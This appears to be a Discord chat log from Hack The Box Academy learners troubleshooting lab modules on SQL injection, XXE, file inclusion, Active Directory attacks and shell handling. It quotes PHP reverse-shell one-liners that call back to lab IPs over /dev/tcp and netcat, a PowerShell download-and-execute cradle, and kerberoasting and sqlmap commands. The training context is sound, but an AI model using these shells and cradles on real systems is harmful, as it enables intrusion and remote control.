#modules
You'll need to link your account following #welcome to access the channel that guy linked
@ocean night yall need to make the account link button actually work
Umm... I have no phone or working phone number, ex made sure of it...
Don't need a phone to verify dude
Which link button, for account.hackthebox?
Yeah
I am screwed on verification and cool let me try then
It.. does? If it isn't for some, I'll mention it
? You just need an htb account
The /verify works
Oh, I thought I had mostly figured it out when changing my source port so that I now see 50000 is open. I have tried using decoy IPs as well but haven't gotten different answers. When trying to use -S to spoof an IP on the same subnet as it, I get errors saying it is unable to reach the host.
But on the account.hackthebox.com site linking the account via that api doesn't work :) (it also didn't work in academy)
Decoy IPs are useless
Is it not working for you?
And you need to have control over the ip to spoof as it
Can raise it internally, just would need something to go on
It hasn't for many, I tried a bit ago when I won silver to get the account link and never got the 'academy' role
So, for Discord roles?
Ye
Ah ok, so not the actual linking of accounts to account.hackthebox
Yeah sorry for the confusion lol
np, will drop a message in bot channel
Bet let me link
I can see at some point about making a dummy account and try and link purely from the https://account.hackthebox.com > Security Settings > Discord account
It does nothing
Bro answered my prayers
It would be neat for it to actually do something
It's being worked on, though.
@fathom pendant thank you
Already being worked on
You have no clue how helpful that is
Imho not having it there until it's ready would be far better
Thanks Emma
Or having a disclaimer that [currently does nothing]
And linking to a forum/article about linking via the app.hackthebox.com api token
Nope you don't have a role
i linked it only
Unless discord hasn't updated yet
lol i mean linked
Linking via account.hackthebox.com does nothing [for now]
You need to link via https://app.hackthebox.com per the #welcome instructions
I am looking at that now
You sent your token as a message - bot commands - use the /identify command @minor locust
You're the goat, I did lol, for some reason I thought it was a click on url to link kind of thing
I might get back to sweeping up these easy skill paths, might tackle the 8 seas adventurer mission in academy for fun, it includes the ad skill path (which i think is also in the CAPE job path), only one outside all that is the OSINT module
I am going to speedrun this and codecademy as the main one since I am paying 200 and something yearly
Don't speedrun
Learn
You aren't in a race, you should be here to learn
You are not in competition with anyone in Academy
I'm not saying that to get you to spend more time on the platform. I'm saying it because if you rush through things, and only do the bare minimum, you'll end up coming out the other side with much lower retention of the knowledge you've had to demonstrate through the modules and courses.
Running gets you nowhere fast except tripping over yourself
I regret not spending a bit more time in the web modules because in my head they were 'too easy' and it bit me in the ass when I didn't have notes ready
I want to experience as much of the things out there first before that
I'm just a little picky is all
I do know a lot already so when I say speedrun that means just going through at a normal pace which is like a week for a whole course and another to practice
Yeah I won't rush it like that lol
I want to learn and keep the information relevant
VPS not needed either. Proxying is the right track, don't forget about source ports
yeah I set it to 53
That foreheads so white it's shining like the sun
-p is the same as --source-port for netcat
The ears are huge too lmao
With netcat as well?
yes
Have some patience after running the nc command, it can take up to a minute
oh i found my issue
Deleting your earlier message bc spoiler
And I'm curious as to your issue lol. PEBKAC?
i wasnt running it with sudo
I would like to study and observe from someone here as I work on it all to share information with if similarities exist.
This is a self paced course, you can maybe find a study buddy in #1318239802931286066
bet
#1318239802931286066 is strictly for HTB teams at the moment
i'll probably make a pinned post later
hi I am facing difficulty with the blind xpath injection? anyone able to help me to see the error in my code? thank you.
TIL you can drop the cheatsheets into Obsidian inline
I normally just make a folder for the cheat sheets and drop them there by module
I did the same, thought this was more convenient
can someone help me with What is the inode number of the "shadow.bak" file in the "/var/backups" directory? in linux fundamentals
What's the issue you are facing?
(in question 2)
after running stat -c %i /var/backups/shadow.bak this command it shows /usr/bin/stat: cannot statx '/var/backups/shadow.bak': No such file or directory
So what's in the /var/backups directory?
(there certainly should be a shadow.bak file there)
i dont know its showing nothing
Have you connected to the target?
im sorry i didnt get it like what target ....?
another target machine or something
yes
You need to click that to spawn the target, then SSH in to it with the provided details. You need to be connected to the VPN as well, either through the Pwnbox, or via OpenVPN (with the config file you can download to the right of that)
If you click on "Click here to spawn the target system!", it'll create the target for you to connect to
So long as you are connected to the VPN, you will be able to SSH in to the target, and then find the answers for the questions
The purple team tier 0 for the last assessment on going from zabby to root I wouldn't expect a beginner to know how to priv esc
but is a short and nice course
This is just the Linux Fundamentals module though
Sorry, that came across wrong
We all start somewhere
yes it gave me a target so now what should i do with target
im sorry im beginner in it i just started like 2 weeks ago
i tried to get help from youtube but it was not much helpful
Module: Document and reporting module lab
Connect to the testing VM using Xfreerdp and practice testing, documentation, and reporting
against the target lab. Once the target spawns, browse to the WriteHat instance on port 443 and
authenticate with the provided admin credentials. Play around with the tool and practice adding findings
to the database to get a feel for the reporting tools available to us. Remember that all data will be lost
once the target resets, so save any practice findings locally! Next, complete the in-progress penetration
test. Once you achieve Domain Admin level access, submit the contents of the flag.txt file on the
Administrator Desktop on the DC01 host.
i am stuck at this question, can any one help me out!
Ok, so it is prompting you to SSH in to the target. Have you used SSH before?
no
I have tried password spraying attack, got smb cred but did not find domain cred,
You should have read about SSH in a previous section in this module https://academy.hackthebox.com/module/18/section/70
Note, you are provided an IP address and a PORT NUMBER, so you may need to adjust the instructions slightly. You can find help about how to use commands in the previous section from the above https://academy.hackthebox.com/module/18/section/67
Sorry, but I've gotta go. Hope that helps you
sweeping up the skill paths https://academy.hackthebox.com/achievement/667914/path/9
In this path, modules cover the basic tools needed to be successful in network and web application penetration testing. This is not an exhaustive listing of all tools (both open source and commercial) available to us as security practitioners but covers tried and true tools that we find ourselves using on every technical assessment that we perfo...
nice
just missing bash scripting and ASM from the intro ones :)
haven't decided if i wanted to do the BOF ones
Hello has any one completed dcsync section from active directory attack and enumeration... I have already been through the section, just have a doubt to clear .. please reply if anyone finds time
Sure I have completed that
Can someone assist me with Bypassing Basic Authentication on web attacks?
need to run a curl command to see what http headers the backend accepts, the example they gave me is :
curl -i -X OPTIONS http://SERVER_IP:PORT/
HTTP/1.1 200 OK
Date:
Server: Apache/2.4.41 (Ubuntu)
Allow: POST,OPTIONS,HEAD,GET
Content-Length: 0
Content-Type: httpd/unix-directory
When I run it, I don't get the Allow output:
curl -i -X OPTIONS http://94.237.54.116:52101/
HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 06:52:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1158
Content-Type: text/html; charset=UTF-8
Any idea of what I can do to show the allow output? maybe a different flag/method?
If i run the command on https:example.com? i get the desired result
I wasn't getting the options either, I just gave up
did you get the flag? I also cant change request method from GET to HEAD.. have no idea
Or I can, but not getting the results expected
hi, I'm just new to htb although been a certified OSCP can i know how to enable the general channel write access in htb ?
thanks i have completed it
thankyou
the reason is, that the web-server is not able to interpret php8-Files as php-Files.. i would try another extension
hello! does anyone know if exporting the academy material to have it printed is against any rules? i find a physical book much easier to consume and find it more engaging
ah was deleted
yes
do you think I should send this to support?
I think it is best if you ask support
Sorry, I thought the "ah was deleted" was on the advertising I deleted
all good ;3 thanks!
anyone has the same problem with Attacking Common Applications - Skills Assessment I? i cant get shell with the CVE.py,
was able to upload nc.exe but cant get shell
nvm it worked after restarting pwn box
Hi guys,
I am doing the FUNDAMENTALS OF AI module, and I got stuck on the Skills Assesment on the last question:
" What deep learning architecture, known for its ability to process sequential data like text by capturing long-range dependencies between words through self-attention, forms the basis of large language models (LLMs) that can perform tasks such as translation, summarisation, question answering, and creative writing? "
The answer is "Transformer", but it does not accept it.
Any clues?
write it in plural
Any good laptops for hacking ?
Hacking depends on the skills mostly
there's a saying in photography, "the best camera is the one you are carrying"
A poor carpenter blames his tools
You can have a 4k 144hz monitor, but if you're dogshit at the game it won't matter
Would recommend something with enough ram
I like the thinkpad t14 g4 amd 7840u
Okay
Still, it will depend on different aspects and your intentions... will you be running a virtual machine or bare metal? Multiple VMs at the same time or not?
My bare metal Celeron netbook works wonders (just not for hash cracking obviously).
And if you have a decent setup, for learning, you can always use the browser based VM.
Is there a way I can reset my progress on certain modules and/or paths?
can anyone help me on why I can't stabilize my shell?
after I write fg I can't do anything
I can't ctrl+C or anything
provide stty raw -echo; fg on a single line
When I get a reverse shell, the first thing I typically do is "upgrade it". That means running script or Python to get a TTY, then backgrounding it and running stty raw -echo. Let's figure out what all of that is doing.
Check out some other "Hacking Foundations" videos:
- Exploring bash Reverse Shell - https://youtu.be/OjkVep2EIlw
- Exploring m...
It's a zsh quirk
Thanks guys!<3
If anyone struggles to install padbuster for the HTTPS/TLS Attacks module - there is a free burp suite extension that works just as well called "Padding Oracle Hunter"
You are da man! I was so silly. Thank you.
Im having an issue with the Academy module Pass the Ticket (PtT) from Linux. I'm connected to vpn but the host is unreachable. When I use the browser Parrot VM it can connect just fine, but I'd rather use my local VM that I've been using this whole time
Why aren't you using the target ip?
put 'david@inlanefreight.htb' in single quotes
also you only have one vpn running, and aren't running the in-browser pwnbox at the same time?
have you also tried changing vpn region and resetting your openvpn connection?
One VM running connected to VPN. Did not disconnect when I tried the browser pwnbox
Only redownloaded VPN connect file, did not change region
turn off the browser pwnbox
make sure you sudo killall openvpn before connecting to the new one
hey it magically started working
sorry for raising the alarm, I had given up last night from this issue and had the same this morning. on lunch break at work and got frustrated. Thanks for the help!
this box is frozen.....
Module: Web Attacks
Section: Blind Data Exfiltration
Question: Using Blind Data Exfiltration on the '/blind' page to read the content of '/327a6c4304ad5938eaf0efb6cc3e53dc.php' and get the flag.
I have tried to follow the first method exactly as given, but I am not getting the second request after fetching the xxe.dtd file. I cannot spot any mistakes.
I tried the second method with XXEInjector and that worked fine
You're missing a > in your dtd file
well that was simple, thanks
Good Afternoon, someone can help me?
guys, I'm trying to list available shares of the target machine, why am i getting this error? Connection is ✅
I would suggest you ask your question directly, so someone can take a look
Can you ping the target?
yes
i don't know why i can't get it the wrappers
hmm reset the machine
order of arguments seems to be important for smbclient, try -U and then -L
i tried both options none worked unfortunately!
Wich question/module are you doing? @dawn abyss
smbclient -L //server_name -U users try adding // before the ip
worked, thank u!
I am a bit stuck on the ADCS Attacks -> skills assessment
requested a Cert (with coercion), but it needs approval to be issued from admin
on the dev machine, i can connect on SMB but in IPC$ is readable
i setup proxychains, but can't make the xfreerdp to work over the SSH tunnel to the dev machine
im doing the module on shells in the pentest path and it makes a point of how a bind shell drops you directly into an (interactive) bash session... and i guess the implication being that reverse shells require upgrading?
is this always true:
-bind shells connect to interactive
-reverse shells must always be upgraded to interactive
?
I am working on the RDP and SOCKS Tunneling with SocksOverRDP in the Pivoting and Tunneling module, I am stuck on connecting to the windows machine with the flag, every time I try to rdp it allows credential entry and the window pops up but then it closes the connection before the desktop can be displayed. I am getting some errors in the proxifier - " Cannot connect to placeholder (fake) ip address, its recommended to restart the client application"
Nope, it depends on what's configured to begin with. Sometimes you will land in a restricted shell and will need upgrade. But for reverse shells I think it could be true for most cases.
with what HTB Academy module?
File Inclusion
the wrappers
i can't find it
i'm not sure what you mean.. if you can describe what you're trying to do and what the issue is
the problem is that i can't find Try to gain RCE using one of the PHP wrappers and read the flag at/
BurpSuite not loading i think
and what have you tried doing
provide some screenshot for your request?
Does completing a skill ass. automatically give you the cubes for everything else in that module? Or do you need to do each section too?
you have to do everything individually
So what was the reasoning behind making session security a multi machine module?
second is true but only if you want the same experience
maybe ask the module author?
Hey
Yo
Hey everyone! I've been wondering: If I already have a Golden Ticket and an NT hash, why would I need to crack the password hash? Could you help clarify the scenarios where cracking a password hash would be useful, and also when it might not be necessary while attacking Active Directory? Thanks in advance for sharing your insights!
If I recall correctly, one of the primary reasons is for systems that are not AD joined. So in general, password reuse. Might be missing some additional details though
you need user creds for other systems
but yeah it might not be necessary in AD
Thanks!
Hello all. I am working the last question on the SMTP Section under the Footprinting Module. I am using the appropriate script with nmap. I've used the resource but I believe there is an issue with timing however, I've tried several timing settings from the script's options not "T0, T1, etc" and my results are right. Any assistance would be appreciated. Thank you.
Don't use the nmap script. Just use the standalone one
t0 affects nmap scanning, not script options
Interestingly I am not using the T settings but the unpwdb.timelimit albeit through nmap. Does manipulating that setting not work if it's through nmap?
Linux Privilege Escalation - Kernel exploit.
I got the proper exploit that was mentioned in the hint, however upon launching it I have a bash shell which is apparently root.
Problem is that I am somehow not allowed. I also noticed that in the exploit itself the shell is launched with the parameters:
"--norc" "--noprofile" (2nd pic)
Do I have to edit the exploit in some way or no?
I was able to obtain the flag using a shell from a previous task, but that's not the point. I want to know where to fix the exploit so I do it the way it's supposed to.
There's a standalone smtp-user-enum script
Ah. Found it and working with it now. This lab would lead you to think it can be solved using nmap. Is this lab a bit misleading or am I just not thinking out of the box enough? I am genuinely curious.
You'd need to pass in --script-args
Wow this AD module is a long one
https://academy.hackthebox.com/module/details/143
Thank you so much! I was able to solve this with stand alone perl script manipulating the "-w" variable. It's odd that the nmap nse script manipulated the --script-args unpwdb.timelimit method for the same amount of time did not give the same effect. Do you have a thought on why that might be? It would seem like they should have the same effect.
Each script has their own args to pass. I never botheted
Bothered*
Sounds like it will be another hacking mystery. Thank you again.
Hi I am stuck in the "password attacks module". I am at the "protected files section" There is only one task
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer. i have logged to the machine using kira password but i can't find the " id_rsa file "
any hint ? i used ||grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"|| but i found nothing
In the "Intro to C2 Operations with Sliver" -> "Assumed Breach" module, it utilizes a stager.txt file under the scheduled tasks section but the generation for this file doesn't appear to be shown anywhere (previously only an aspx stager was generated). Am I missing something here?
Wasn't stager.txt also used in the aspx section?
staged.txt was used but its just a shellcode byte array
I assume to get stager.txt to execute inside iex(new-object net.webclient).downloadString('http://10.10.14.62:8088/stager.txt') you need to put the byte array in some sort of shellcode loader that was never mentioned in the module
Also this wasnt required to complete the section so maybe its just extra credit but idk kinda feels a bit off to not include a basic example loader and compilation steps
Did you check the users .ssh dir?
have you tried it?
i dont think i did that part but im pretty sure the iex just loads it
I did it didnt seem to be working for me, I can try again in a bit
yeah no if you try loading the stager.txt they showed before you just get the error byte[] : The term 'byte[]' is not recognized as the name of a cmdlet, function, script file, or operable program.
which makes sense cause the stagers are always generated as shellcode
Hello. For greenhorn machine, when I upload a reverse shell.zip file to greenhorn, it doesn't connect to netcat. Netcat keeps listening. I have tried to use pentestmonkey reverse shell.php and the php code that ippsec showed but no luck.
I get no access
public channels, makes sense
it'll probably get a bit wordy if they explain why in a description, probably good for an update to #welcome
or if there is an FAQ on their website about how HTB discord operates
I am trying to test HTB Box Vintage but encountered difficulties. According to the domain account provided by the author, bloodhound-python cannot be used, always reporting errors such as authentication failure, but windapsearch and ladpsearch can be used normally. Is it really impossible to use bloodhound here? I hope someone can enlighten me, and I sincerely appreciate your help in advance.
try asking in #boxes
I don't have access to that place, and I don't know what's causing it
follow the steps in #welcome
ok
Hello, may I have some help for the web attacks skill assesment ?
I found an IDOR vuln allowing me to access the profile of any user but can't find anything more...
Enumerate the users and look for a user who may have higher privileges than others.
Ok thanks I did that but if i found nothing I guess my script has an issue. I will go back to this step
I'm doing the Stored XSS portion of the XSS module. I'm testing the payload "<script>alert(window.origin)</script>" in the To-Do list but it is not popping an alert window. anyone had this issue? also getting a error: request validation, anytime i try to start the pwnbox
I bet trying again tomorrow would fix it ;p
Under the XSS Testing Payloads section it explains you may need to use a different payload...
Might be a dumb question but is it possible to run my own bash to go through modules instead of using theres
you can use your own virtual machine instead of the pwnbox, if that's what you're asking
you just need to download and use the vpn file
oh okay thanks
hey , i trying to figure out how to know the internal app asked for in injection Attacks Module Exploitation of PDF Generation Vulnerabilities Section , have been trying for 2 hours to know what is it and how to reach it
This module covers three common HTTP vulnerabilities: Web Cache Poisoning, Host Header Vulnerabilities, and Session Puzzling or Session Variable Overloading. These vulnerabilities can arise on the HTTP level due to web server misconfigurations, other systems that have to be considered during real-world deployment such as web caches, or coding mi...
Well, it was kind of tricky, but got a lot of fun
Please don't post potential spoilers also always be mindful of what you're looking at.
how to solve this sir? its under basic toolset, ive used every NSE script available but still dont find the right flag
Are you sure that service is the right service, and not say a web service?
Also always make sure no extra whitespace in front or behind the copy/paste
yes sir i always make sure
wdym by this sir? sorry im still learning
but all i did is scanned all the ports
Maybe check all the ports you found
individually? does it give a different results if i scan one by one?
Each port is hosting a different service. Don't solely rely on nmap, this one is a bit silly with scripts sometimes
But the scripts shown in the section should be helpful
hey i am wanna know is there any resource to learn win authentication . On HTB its very high level to me .
There's several windows related modules, from basics to not so basics (mostly AD)
Unless I'm misunderstanding
Might be a lost in translation thing, not sure what you're meaning by "learn Win authentication"
i mean on yt i dont understand a thing about it and on other websites too
yeah and how they work
i am on password attacks module and there they introduced win authentication . then didn't understand that and went to yt there i found bluehat conference video explain win authentication . and again i didn't get it
let me try finding windows basics and maybe i can find something in that module
Are you referring to a flag in a command stating like -windows-authentication?
If so. You're massively overthinking it
they said in the module its complex
That command flag just tells the process that it will be interacting with a windows machine and encode/wrap communication with the appropriate TLS
Not as complex as you're thinking, what exact section?
It's complex in the sense that they're not gonna explain it in the password attacks module
in the module password attacks
Oh, you don't really need to dive into how the authentication works
get lost bro you are not a social engineer
yeah but i wanna know at some point in life it will come handy
It really won't
At a surface level all I've needed to know was just the credential stuff like NTDS.dit, the SAM/SYSTEM/SECURITY hives, and the LSASS.dmp
Alongside ticket shenanigans via mimikatz/rubeus. But the ticket stuff is (again) surface level. You'll learn more about it when you actually need it
But you don't need to know the low level details of how they're stored and the encryption mechanisms
yeah i will take this advice .
As there's already tools that do the hard part for you
Unless you actually want to dig deep into it and write your own scripts to decode/decrypt those. But that's far beyond basics
you are right but i like to study like this . and for the sake of saving time i will skip this
Idk mate Session Fixation sounds like a non issue. Isn't a session cookie supposed to stay the same and id a session anyway?
yeah i dug deep into named pipes and IPC by reading LINUX PROGRAMMING INTERFACE . BUT AT LAST THAT KNOWLEDGE IS NOT USEFULL TO ME
That's the neat part, you'll likely rarely (if ever) use named pipes
YEAH OTHER THAN BIND SHELL
please release your shift key
Why are you yelling for?
The aim of this presentation is understanding the art of user impersonation in Windows systems. This knowledge will be handy when performing lateral movements and other interesting attacks within Windows and Active Directory networks
Also, your name is cringe 
It's a matter of perspective really
I think they meant about the auth mechanisms themselves
Not your name, your name is nerdy
Oh okay
yeah i think so
Their name is giving MrR0b07 vibes
what about sam sapeol
Who?
is Skills Assessment at Introduction to Windows Command Line lab machine down? I cannot get connection to the assessment machine. I checked if this was a problem of my VPN, but if I spawn a machine in any other section within the same module I do get connection to the module task machine, weird. I even tried spawning Pwnbox and it does not have connection either
Hello guys , i wish all is fine . and need a help (these words are from my heart ) i started learning the path of cpts and when i finish the fifth module i repeat again . because i am afraid that i miss anything and there are some points that i didn't understand 100 % . so please give me your advices . and if there are some suggestions on how to study for cpts ex: videos or ....
Do some boxes, the exam won't be exactly like the modules.
On Injection Attacks - LDAP Authentication Bypass I dont understand why they provide user login creds?
i think to Lateral movement
Hi guys, currently on the sql map module and having a little trouble with "running sql map on an http request" section. I am stuck on the second question which is case 3. I am a little confused on how to go about doing it (possibly because I'm coming back to this after a while and skimmed the text). I tried intercepting the request in burp and saving it as a txt file and running it but no luck
this is the page
On the page it says what field you should test and that is not tested by default (in level 1), so you either have to manually point the tool to the injection point or increase the level to 2
I tried this sqlmap - u url --cookie "value=1, name=id" --dump
this is the hint
Try to see where the 'id=1' is sent, and specify this location as the injection mark.
however Ive already clicked the button for the id being sent and I cant seem to get it back otherwise I would have intercepted with burp
The request should be in your text file and why don't you try the stuff mentioned in the hint?
thats what im confused on, how do I see where the id is being sent?
it says it right there on your screenshot
ahh the email?
no
in the first screenshot where it says "critical" then?
on the webpage
it just says some generic things that you'd find in a database, where does it say where the id is being sent
dont think its a put request?
[WARNING] POST parameter 'id' does not seem to be injectable
heres what i got after testing sqlmap -u ip --data='id=1' --batch
i believe I did, there's nothing to input on the page apparently so what I did was refresh the page and capture the request with burp using that method
Look again
I think it may be cookie instead of "data"
Continue with that idea
and it clearly tells you what to do in the page
Detect and exploit SQLi vulnerability in Cookie value id=1
It tells you to use the cookie, and a cookie can be found where in a request?
okay ive refreshed the page and captured the request, i see that cookie has an id of 1 and I will try to do sqlmap -r req.txt?
in the cookie section in burp
or in the storage section on firefox
Okay, so a small lesson on HTTP requests.
Cookies go in the headers. In your section there's an example of cookies
the --data puts whatever you put in the body
ahhh so change --data to --headers?
in my command?
yes,
--headers="..."
or
--cookie="..."
Best to put in the URL
take in mind, your -Cookie is wrong
its --cookie
And, you still need to tell sqlmap that you want to inject the cookie, and not just provide the cookie
almost there:
sqlmap -u http://94.237.51.215:57471/case3.php --cookie="id=1*" --batch
yes, now read the question again and you got it
ahh ok found out the backend dbms is mysql
you're 1 step away from the answer, need to read the question again for the final parameter
yes
--table ?
almost
--tables ?
sqlmap -h will tell you which parameter to use
ahh ok seem to have gotten flag3 there just need to cat it out somehow
sqlmap -h will tell you how to just get the table you need
yeah --dump
thank you it worked
Took out so much time for something like that
Ah Sorry I forgot to mention the old message
ah np
Can I Message You?
sure, dm me @soft reef
I'm working on the "ATTACKING AUTHENTICATION MECHANISMS" -> "Signature Wrapping Attack" lab and it seems that whether I do the attack manually or try all 8 XSW methods in the Burp Suite SAML Raider extension, I get the error "Invalid SAML Response. Not Authenticated". Can I get some help, please?
Yeah I have some time now.
Is PowerView broken on the skills assessment part 1 box? Getting an error "exception calling FindAll". Tried two versions of PowerView, ep is in bypass, script has downloaded correctly and shows imported when running 'get-module'. Looks like no PowerView commands are working? This is from a meterpreter session gained from the web shell that's provided.
kerberos double hop problem?
try get-domain
I've just got the shell as system though on WEB-WIN01, no results from get-domain
do you have clear text credentials?
No creds
what module is that?
You start with a powershell webshell running as system, so got a meterpreter shell and tried using PowerView
AD enum/attacks part 1
Will check my notes
maybe they changed because my notes I didn't need to get inside web-win01, and you should have at least svc_sql creds
with this cred you can use the -Credential from powershell, most of the times this FindAll is a problem with your logon session
You use WEB-WIN01 to kerberoast/crack that SQL account, that's question 2
I'm gonna be honest with you I didn't even used the windows machine there, only impacket, secretsdump and psexec
Oh I think I found where you are, you used this webshell right? /uploads/antak.aspx ?
Yes, but what I did was add a new user to the administrators group, secretsdump from impacket to get the machine acc hash and then use impacket getusersspn
GetUserSPNs.py INLANEFREIGHT.LOCAL/'WEB-WIN01$' -dc-ip 172.16.6.3 -hashes :<hash> -request -usersfile users.txt
But it is strange that if you are running as system you are technically connecting to the domain with the domain computer account so powerview should have no problems with that
Ahh I see, will go through it that way. Just seems strange, unless it's a double hop issue as I'm going from metepreter session to powershell ? Not sure
Thanks!
I will try some time later this module again and if something works I will tell you
Could try to get a PS rev shell and try PV that way to rule out an issue with your PV.
Did you have to setup a pivot for this? I can't get to the DC from my attacker box, it's on the 10.10 network
Yeah you'll need a pivot to run it from your attack box.
Will give that a go, it's strange as other powershell commands work just not domain related ones
It's not even mentioned proxychains yet so strange how I would be expecting to pivot for the first assessment ? I don't think it has anyway
I think it assumes you would use powerview.
I've done it a few ways for fun and I prefer to setup a pivot and run everything from my VM.
Yes, as the guy said
Box just restarted and PV now works from the meterpreter > shell > powershell and from a direct PS rev shell
Good day. I am working on USING CRACKMAPEXEC > Password spraying. When trying to create a user list from NULL authentication using crackmapexec smb 10.129.204.177 -u '' -p '' --users --export $(pwd)/users.txt, I receive an error on the --export. Is there another way to accomplish this? Thanks
what's the error
netexec: error: unrecognized arguments: --export /root/userslist.txt
It occurs with netexec or crackmapexec.
I tried -o and it appears to work. However, I cannot find the file after successful execution.
is that a real flag?
No. I am trying to create a user list from enumeration of AD Users using NULL sessions.
after it finishes executing it should tell you where it saved to
There should be a .cme or .netexec or similar directory in your home. You may be able to find the file there.
I tried locating it using 'locate', but nothing returns. I will look into the directories.
Please don't ask to ask
Just post your issues and someone might reply
Post what module and section you're stuck at
Hello everyone,
Could someone help me on the Web Attacks module, on the Advanced File Disclosure chapter? I try to reproduce what is explained, but I can't do it in the quiz exercise.
I try with the CDATA method and with the error based.
Could someone help me?
okay sorry
Some exercises are not 100% the same as what is explained on the page. Sometimes you need to think a bit outside of the box
locate may not show hidden directories
So in this case could you guide me on the exercise so that I can understand it well?
Sorry I'm not at my computer
Ok, no worries.
if anyone else could help me that would be great
can someone tell me if theres any functional difference to these two reverse shells?
(outside the exception of /bin/sh and /bin/bash... if the fifo script used /bin/bash would it still work? its the first time im seeing it as its mentioned in the cpts path
<?php system("/bin/bash -c 'bash -i >/dev/tcp/10.10.15.80/4444 0>&1'"); ?>
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>
where is can i send photo
both work just fine; one just utilizes named pipes
the named pipe one though, could one insert /bin/bash instead of /bin/sh ?
or is that a requirement of the pipe?
yes
assuming bash exists of course
you can use any shell
ok tyvm
as long as it exists ¯\_(ツ)_/¯
the named pipe one... that is more academic? ive never seen anyone use it... its a long ass cmd?
not really 'more academic' not even sure what you mean by that
it's just a different way to do something
i mean, it seems that its something mentioned for for students information but doesnt seem to be used often in practice
it can be used in practice
some people prefer the named pipe over the /dev/tcp/ ¯\_(ツ)_/¯
yeah that reminds me... could one do something like (forgive any error here im using the below example as pseudo script as i dont fully understand the mechanics)...
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| /dev/tcp/10.10.15.80/4444 >/tmp/f"); ?>
basically, a variation or combination of the above two methods
to arrive at the same result
it's not a "combination"
it's just another way to do something
but also it wouldn't quite work that way
/dev/tcp/ip/port is a file location moreso than it is an executable
like nc
so you'd more do > or < redirectors
i see
but the best way to figure it out is to spin up a vuln machine and fuck around
the labs are isolated so you can't brick anything that a reset can't fix ¯\_(ツ)_/¯
and you can't mess with someone else's machine
PS C:\windows\system32\inetsrv> $username = "inlanefreight.local\svc_sql"
PS C:\windows\system32\inetsrv> $password = "Redacted"
PS C:\windows\system32\inetsrv> $SecPassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\windows\system32\inetsrv> $cred = New-Object System.Management.Automation.PSCredential($username, $SecPassword)
PS C:\windows\system32\inetsrv> Enter-PSSession -ComputerName MS01 -Credential $cred
When running this I'm expecting a new powershell session but it keeps me at the same prompt. Doesn't show the new session like in the course, any ideas?
how can i sent Photo?
ask nicely /s
you need to link your account via the #welcome instructions
how friend
try with single quotes
there's instructions to link your account in #welcome
Read what Marcie said and follow three simple steps
Exact same, just takes me back to the prompt
PS C:\windows\system32\inetsrv> $username = 'inlanefreight.local\svc_sql'
PS C:\windows\system32\inetsrv> $password = 'redacted'
PS C:\windows\system32\inetsrv> $SecPassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\windows\system32\inetsrv> $cred = New-Object System.Management.Automation.PSCredential($username, $SecPassword)
PS C:\windows\system32\inetsrv> Enter-PSSession -ComputerName 'MS01.inlanefreight.local' -Credential $cred
PS C:\windows\system32\inetsrv> whoami
nt authority\system
PS C:\windows\system32\inetsrv> hostname
WEB-WIN01
I have a serious question. Suppose, I get a one month subscription where I unlocked all the modules upto tier 2. Then, my subscription ran out. Then the module access are also lost..?
oh... I see. Thanks for the info.
any access-based subscriptions you don't keep the modules unless you 100% completed them
any doc on how to make msfconsole work with proxychains ? more precisely forward the shell over an intermediate server ? because the server that is exploited can not talk directly to my tooling server
Nice screenshot
You can still take screenshots from your host you know
i don't know
Hello
try inlanefreight\user
Hello, i am doing the Footprinting Easy Lab, I skipped the DNS and logged in with the ||ceil ID over ftp||, i used ||ls -la||. i only see the root user but not really a directory i guess, just '.' and '..' any help would be appreciated
I remember using the error based method. Not much deviation from that section that I recall.
okey guys
now sorry my cloumsiness
clumsiness
that is my problem
i can't find the wrappers
at burpsuite
this section tends to work best when you're looking at the page source
also best practice to just add at least 4-5 ../
i don't understand friend. can you explain it to me better?
the > raw < instead of > render < or even > pretty <
scroll through the render/raw/pretty output
mmm
Module: Active Directory enumeration and attacks
Section: enumeration & retrieving password policies
I am having trouble on finding out the default password length when a new domain is created.
XMLLint doesnt seem to be operating "exactly" as output in a demo im walking thru...
Demo Output:
Exciton@htb[/htb]$ curl -s http://10.129.42.190/nibbleblog/content/private/users.xml | xmllint --format -
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<users>
<user username="admin">
<id type="integer">0</id>
<session_fail_count type="integer">2</session_fail_count>
<session_date type="integer">1608182184</session_date>
</user>
<blacklist type="string" ip="10.10.10.1">
<date type="integer">1512964659</date>
<fail_count type="integer">1</fail_count>
</blacklist>
<blacklist type="string" ip="10.10.14.2">
<date type="integer">1608182171</date>
<fail_count type="integer">5</fail_count>
</blacklist>
</users>
My output:
$ curl http://10.129.215.78/data/other/authorization.xml | xmllint --format -
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-100 114 100 114 0 0 6212 0 --:--:-- --:--:-- --:--:-- 6333
<?xml version="1.0" encoding="UTF-8"?>
<item>
<apikey><![CDATA[4f399dc72ff8e619e327800f851e9986]]></apikey>
</item>
What's up with the wget-like download output? Also, other than that, is it "working"?
any concerns?
i was hoping for prettified output
its not much diff than curl this might just be a poor example

ok nvm i tried with a longer file, its working
oh my god now I get it, I don't understand anything xD
Has the AD enum assessment 2 been updated? SAM hashes are different now?
Can't believe I can see the 9 at the front. Seemed almost impossible at the start
:D
I'm doing the local file inclusion. Can anyone tell me why this isn't working? It should display the passwd file but it's just blank now
Nice screenshot
Lmao my Mac can't download discord
you probably need a few ../../
You're right thank you
Working through Shells and Payloads on Antak section, can't find the portion of the website allowing me to upload a file... Any nudges?
Intro to Academy's Purple Modules - on the zabbix part, I got the shell after running the exploit. I can't seem to find the root.txt file that's supposed to be in /root. Any advice what I might be doing wrong?
its right there at the bottom
CPTS : Information Gathering - Web Edition (Web Archives)
10th June 2017?
0 snapshots ?
Hackthebox didn't always use .com
Okay will look into that, thx for the reply
They are an eu based company. Your only other hint
lol
Am I going blind then, because I don't see anything....
how can we use the vpn? if im using a wsl
